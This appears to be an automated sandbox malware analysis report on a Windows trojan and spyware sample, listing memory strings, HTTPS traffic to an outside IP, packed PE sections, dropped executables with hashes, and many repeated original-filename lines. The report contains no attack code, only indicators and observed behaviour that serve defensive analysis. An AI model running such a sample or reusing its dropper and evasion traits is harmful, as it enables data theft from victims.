Source: BVGvbpplT8.exe, 00000001.00000003.2320260078.0000000005CF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: BVGvbpplT8.exe, 00000001.00000003.2320260078.0000000005CF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: BVGvbpplT8.exe, 00000001.00000003.2320260078.0000000005CF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BVGvbpplT8.exe, 00000001.00000003.2343355537.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: BVGvbpplT8.exe, 00000001.00000003.2228499656.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49788 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: BVGvbpplT8.exe Static PE information: section name:
Source: BVGvbpplT8.exe Static PE information: section name: .idata
Source: BVGvbpplT8.exe Static PE information: section name:
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe.1.dr Static PE information: section name:
Source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe.1.dr Static PE information: section name: .idata
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: section name:
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: section name: .idata
Detected potential crypto function
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00CFD390 1_3_00CFD390
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00CFD390 1_3_00CFD390
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_05BE2D3F 1_3_05BE2D3F
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00CFD390 1_3_00CFD390
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Code function: 1_3_00CFD390 1_3_00CFD390
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Code function: 13_2_0045DCB7 13_2_0045DCB7
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Code function: 13_2_0045E729 13_2_0045E729
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe 2AEBE4A6A652C6DE494CF0A16B36FF6788933B807A2651350960B5644C7A1185
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe E65319903B70AE142A07B8BF5F4573AC65B428E26CD93CBF2380E5E00F4EFC0D
Sample file is different than original file name gathered from version info
Source: BVGvbpplT8.exe, 00000001.00000003.2467367729.0000000005C51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2484900150.00000000061A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2474273193.000000000616F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2458036557.0000000005EDA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2475590327.0000000006078000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2489001803.000000000607B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2460789976.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2463613352.000000000607C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2472716823.000000000607A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2469868738.0000000006078000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2467077749.0000000006134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2482359636.00000000062B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2485447968.00000000061AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2486356898.00000000062F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2484742734.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2482198594.0000000006195000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2468556387.000000000612C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2474086827.000000000607D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2457903021.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2467742587.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2488595699.0000000006082000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2489381113.0000000006079000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2481881639.000000000618E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2480515223.0000000006282000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2467487826.0000000005CD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2470859384.0000000006153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2486145687.00000000061AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2470009528.000000000613C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2485721637.00000000062E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2469023346.00000000061E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2484545214.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2473500436.0000000006252000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2466771234.00000000061D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2479298663.0000000006292000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2469174653.000000000607B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2478277731.000000000617E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2498986100.000000000607F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2479682055.000000000607A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2466937941.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2481533258.0000000006188000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2493123655.000000000632C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2485139417.0000000006076000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2485939050.0000000006079000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2497089920.00000000061DF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2477562232.0000000006081000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2467587313.0000000005BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2499741961.000000000607D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2471054363.000000000607D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2484143811.00000000062BD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2486578879.0000000006080000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2486832404.00000000061C4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2468249432.000000000612B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2470150676.0000000006202000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2472961674.0000000006157000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2471257892.0000000006148000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2480943093.0000000006081000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2478767506.000000000607F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2471642768.0000000006149000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2482037901.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2482710301.000000000619B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2487641534.0000000006079000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2472227083.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2483769014.0000000006197000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2472454481.000000000615F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2497471500.0000000006344000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2471413589.000000000607D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2482540550.000000000607F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2488229836.0000000006080000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2487018755.000000000607D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2487234694.00000000061C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2470513208.000000000614F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2497722164.0000000006081000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2484357853.000000000607F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2499386746.00000000061F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2496162283.0000000006078000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2459674946.0000000006113000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2474588986.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2489618075.00000000061CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2473736920.000000000607B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2489188822.00000000061CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2488781625.00000000061CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2473177405.000000000607B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2487825806.00000000061B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2488412746.00000000061D4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2475257628.000000000616E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2480042552.000000000617A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2469723075.0000000006143000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2463017968.0000000006122000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2483377707.00000000062C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2459859656.00000000061B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2483544297.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2483212200.0000000006197000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2476282887.000000000616C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2466319178.0000000006078000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2482875423.000000000607B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2468872659.0000000006126000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2473339054.0000000006161000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2470702557.0000000006083000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2481698157.000000000607C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2468699132.000000000607A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2458512614.0000000005EDC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2500791855.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2476999559.000000000626B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2500306302.00000000061EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2467243237.000000000607E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2479005872.0000000006185000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2458206429.0000000006085000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2469584192.000000000607B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2468111057.0000000006080000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2468396888.000000000607A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2472063355.0000000006222000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2488037236.0000000006305000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2473890507.0000000006175000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2470319602.000000000607F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2467362385.0000000006127000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2466600049.0000000006123000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2459363747.000000000607D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2465691566.000000000611E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2469458372.0000000006140000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Source: BVGvbpplT8.exe, 00000001.00000003.2498384801.00000000061EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs BVGvbpplT8.exe
Uses 32bit PE files
Source: BVGvbpplT8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: BVGvbpplT8.exe Static PE information: Section: ZLIB complexity 0.9974448844178082
Source: BVGvbpplT8.exe Static PE information: Section: xpumokpk ZLIB complexity 0.9947723635444744
Source: O215CKAM4VJZ3EV7.exe.1.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@11/4
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\44WNAJWW05E0258PKFVID8DSXYO93MX.exe.log Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Mutant created: NULL
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File created: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
